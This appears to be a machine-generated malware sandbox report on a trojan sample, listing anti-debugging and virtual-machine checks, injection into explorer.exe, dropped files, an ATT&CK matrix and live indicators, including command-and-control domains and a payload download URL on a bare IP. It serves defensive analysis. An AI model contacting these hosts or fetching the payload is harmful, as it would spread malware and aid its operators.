      Source: explorer.exe, 00000001.00000000.1731082031.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000001.00000000.1735407211.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
      Source: explorer.exe, 00000001.00000000.1734283056.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
      Source: explorer.exe, 00000001.00000000.1734283056.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1734283056.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000001.00000000.1735407211.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
      Source: explorer.exe, 00000001.00000000.1731082031.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
      Source: explorer.exe, 00000001.00000000.1734283056.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
      Source: explorer.exe, 00000001.00000000.1729259772.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: explorer.exe, 00000001.00000000.1729259772.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\wehrbbiSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\F421.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\rghrbbiSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\wehrbbiProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\F421.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\rghrbbiProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_00401E65 rdtsc 6_2_00401E65
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_02C30D90 mov eax, dword ptr fs:[00000030h]0_2_02C30D90
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_02C3092B mov eax, dword ptr fs:[00000030h]0_2_02C3092B
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_02DFA184 push dword ptr fs:[00000030h]0_2_02DFA184
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_02C70D90 mov eax, dword ptr fs:[00000030h]5_2_02C70D90
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_02C7092B mov eax, dword ptr fs:[00000030h]5_2_02C7092B
      Source: C:\Users\user\AppData\Roaming\wehrbbiCode function: 5_2_02D29F6C push dword ptr fs:[00000030h]5_2_02D29F6C
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_02CB0D90 mov eax, dword ptr fs:[00000030h]6_2_02CB0D90
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_02CB092B mov eax, dword ptr fs:[00000030h]6_2_02CB092B
      Source: C:\Users\user\AppData\Local\Temp\F421.exeCode function: 6_2_02DAA070 push dword ptr fs:[00000030h]6_2_02DAA070
      Source: C:\Users\user\AppData\Roaming\rghrbbiCode function: 8_2_02BA0D90 mov eax, dword ptr fs:[00000030h]8_2_02BA0D90
      Source: C:\Users\user\AppData\Roaming\rghrbbiCode function: 8_2_02BA092B mov eax, dword ptr fs:[00000030h]8_2_02BA092B
      Source: C:\Users\user\AppData\Roaming\rghrbbiCode function: 8_2_02D2A070 push dword ptr fs:[00000030h]8_2_02D2A070

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\explorer.exeFile created: rghrbbi.1.drJump to dropped file
      Source: C:\Windows\explorer.exeNetwork Connect: 186.233.231.45 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 116.58.10.60 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeThread created: C:\Windows\explorer.exe EIP: 31119A8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\wehrbbiThread created: unknown EIP: 87E19A8Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\F421.exeThread created: unknown EIP: 8741970Jump to behavior
      Source: C:\Users\user\AppData\Roaming\rghrbbiThread created: unknown EIP: 8771970Jump to behavior
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\wehrbbiSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\wehrbbiSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\F421.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\F421.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\rghrbbiSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\rghrbbiSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: explorer.exe, 00000001.00000000.1734283056.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1729495582.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1730684274.0000000004CE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000001.00000000.1729495582.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000001.00000000.1729259772.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
      Source: explorer.exe, 00000001.00000000.1729495582.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000001.00000000.1729495582.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_00415B00 InterlockedCompareExchange,ReadConsoleW,FindAtomW,GetConsoleMode,SearchPathA,GetDefaultCommConfigA,MoveFileW,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,GetSystemTimeAdjustment,PulseEvent,SetCommState,GetConsoleAliasesLengthW,GetStringTypeExW,GetComputerNameW,GetTimeFormatW,GetFileAttributesA,GetConsoleAliasExesLengthA,GetBinaryType,LoadLibraryA,InterlockedDecrement,GetFileAttributesA,0_2_00415B00
      Source: C:\Users\user\Desktop\wBgwzVbZuV.exeCode function: 0_2_00415B00 InterlockedCompareExchange,ReadConsoleW,FindAtomW,GetConsoleMode,SearchPathA,GetDefaultCommConfigA,MoveFileW,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,GetSystemTimeAdjustment,PulseEvent,SetCommState,GetConsoleAliasesLengthW,GetStringTypeExW,GetComputerNameW,GetTimeFormatW,GetFileAttributesA,GetConsoleAliasExesLengthA,GetBinaryType,LoadLibraryA,InterlockedDecrement,GetFileAttributesA,0_2_00415B00

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000006.00000002.2354485892.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2705916813.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2011339150.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2011243889.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2706245670.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1760185099.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1759831578.0000000002C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2354402356.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000006.00000002.2354485892.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2705916813.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2011339150.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2011243889.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2706245670.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1760185099.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1759831578.0000000002C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2354402356.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Exploitation for Client Execution
      1
      DLL Side-Loading
      32
      Process Injection
      11
      Masquerading
      OS Credential Dumping1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      12
      Virtualization/Sandbox Evasion
      LSASS Memory521
      Security Software Discovery
      Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)32
      Process Injection
      Security Account Manager12
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive4
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Hidden Files and Directories
      NTDS3
      Process Discovery
      Distributed Component Object ModelInput Capture115
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information
      LSA Secrets1
      Application Window Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
      Software Packing
      Cached Domain Credentials1
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSync14
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      File Deletion
      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1531374 Sample: wBgwzVbZuV.exe Startdate: 11/10/2024 Architecture: WINDOWS Score: 100 39 nwgrus.ru 2->39 41 ninjahallnews.com 2->41 43 fallhandbat.com 2->43 45 Multi AV Scanner detection for domain / URL 2->45 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 6 other signatures 2->51 8 wBgwzVbZuV.exe 2->8         started        11 wehrbbi 2->11         started        13 rghrbbi 2->13         started        15 2 other processes 2->15 signatures3 process4 signatures5 69 Detected unpacking (changes PE section rights) 8->69 71 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 8->71 73 Maps a DLL or memory area into another process 8->73 17 explorer.exe 58 6 8->17 injected 75 Multi AV Scanner detection for dropped file 11->75 77 Machine Learning detection for dropped file 11->77 79 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->79 81 Checks if the current machine is a virtual machine (disk enumeration) 13->81 83 Creates a thread in another existing process (thread injection) 13->83 85 Switches to a custom stack to bypass stack traces 13->85 process6 dnsIp7 33 186.233.231.45, 50855, 50856, 50857 SolucaoNetworkProvedorLtdaBR Brazil 17->33 35 23.145.40.164, 443, 50575 SURFAIRWIRELESS-IN-01US Reserved 17->35 37 nwgrus.ru 116.58.10.60, 50549, 50550, 50551 NEXLINX-AS-APAutonomousSystemNumberforNexlinxPK Pakistan 17->37 25 C:\Users\user\AppData\Roaming\wehrbbi, PE32 17->25 dropped 27 C:\Users\user\AppData\Roaming\rghrbbi, PE32 17->27 dropped 29 C:\Users\user\AppData\Local\Temp\F421.exe, PE32 17->29 dropped 31 C:\Users\user\...\wehrbbi:Zone.Identifier, ASCII 17->31 dropped 53 System process connects to network (likely due to code injection or exploit) 17->53 55 Benign windows process drops PE files 17->55 57 Deletes itself after installation 17->57 59 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->59 22 F421.exe 17->22         started        file8 signatures9 process10 signatures11 61 Detected unpacking (changes PE section rights) 22->61 63 Machine Learning detection for dropped file 22->63 65 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 22->65 67 5 other signatures 22->67

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      wBgwzVbZuV.exe42%ReversingLabsWin32.Trojan.CrypterX
      wBgwzVbZuV.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\F421.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\wehrbbi100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\rghrbbi100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\wehrbbi42%ReversingLabsWin32.Trojan.CrypterX
      No Antivirus matches
      SourceDetectionScannerLabelLink
      nwgrus.ru12%VirustotalBrowse
      SourceDetectionScannerLabelLink
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
      https://powerpoint.office.comcember0%URL Reputationsafe
      https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
      https://excel.office.com0%URL Reputationsafe
      http://schemas.micro0%URL Reputationsafe
      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
      https://word.office.com0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://android.notify.windows.com/iOS0%URL Reputationsafe
      https://api.msn.com/0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
      https://23.145.40.164/ksa9104.exe0%VirustotalBrowse
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%VirustotalBrowse
      https://api.msn.com/q0%VirustotalBrowse
      https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%VirustotalBrowse
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%VirustotalBrowse
      https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%VirustotalBrowse
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%VirustotalBrowse
      https://wns.windows.com/L0%VirustotalBrowse
      http://www.autoitscript.com/autoit3/J0%VirustotalBrowse
      https://ninjahallnews.com/search.php0%VirustotalBrowse
      https://aka.ms/odirmr0%VirustotalBrowse
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%VirustotalBrowse
      https://fallhandbat.com/search.php0%VirustotalBrowse
      https://api.msn.com/v1/news/Feed/Windows?&0%VirustotalBrowse
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark0%VirustotalBrowse
      https://aka.ms/Vh5j3k0%VirustotalBrowse
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%VirustotalBrowse
      https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%VirustotalBrowse
      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg0%VirustotalBrowse
      https://www.rd.com/list/polite-habits-campers-dislike/0%VirustotalBrowse
      https://www.msn.com:443/en-us/feed0%VirustotalBrowse
      https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      nwgrus.ru
      116.58.10.60
      truetrueunknown
      fallhandbat.com
      unknown
      unknowntrue
        unknown
        ninjahallnews.com
        unknown
        unknowntrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          https://23.145.40.164/ksa9104.exetrueunknown
          https://ninjahallnews.com/search.phptrueunknown
          https://fallhandbat.com/search.phptrueunknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1731082031.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalseunknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
            unknown
            https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1740089968.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1734283056.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              unknown
              https://excel.office.comexplorer.exe, 00000001.00000000.1740089968.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.microexplorer.exe, 00000001.00000000.1733819519.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1733347044.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1735918498.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                unknown
                https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  unknown
                  https://api.msn.com/qexplorer.exe, 00000001.00000000.1734283056.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                  https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    unknown
                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1740089968.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      unknown
                      https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                      https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        unknown
                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.1740089968.000000000C99C000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                        https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1740089968.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                        https://word.office.comexplorer.exe, 00000001.00000000.1740089968.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                        https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          unknown
                          https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                              unknown
                              https://aka.ms/Vh5j3kexplorer.exe, 00000001.00000000.1731082031.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                              https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000001.00000000.1734283056.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                              https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                              https://android.notify.windows.com/iOSexplorer.exe, 00000001.00000000.1740089968.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                https://api.msn.com/explorer.exe, 00000001.00000000.1734283056.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  https://outlook.com_explorer.exe, 00000001.00000000.1740089968.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                    unknown
                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://www.msn.com:443/en-us/feedexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
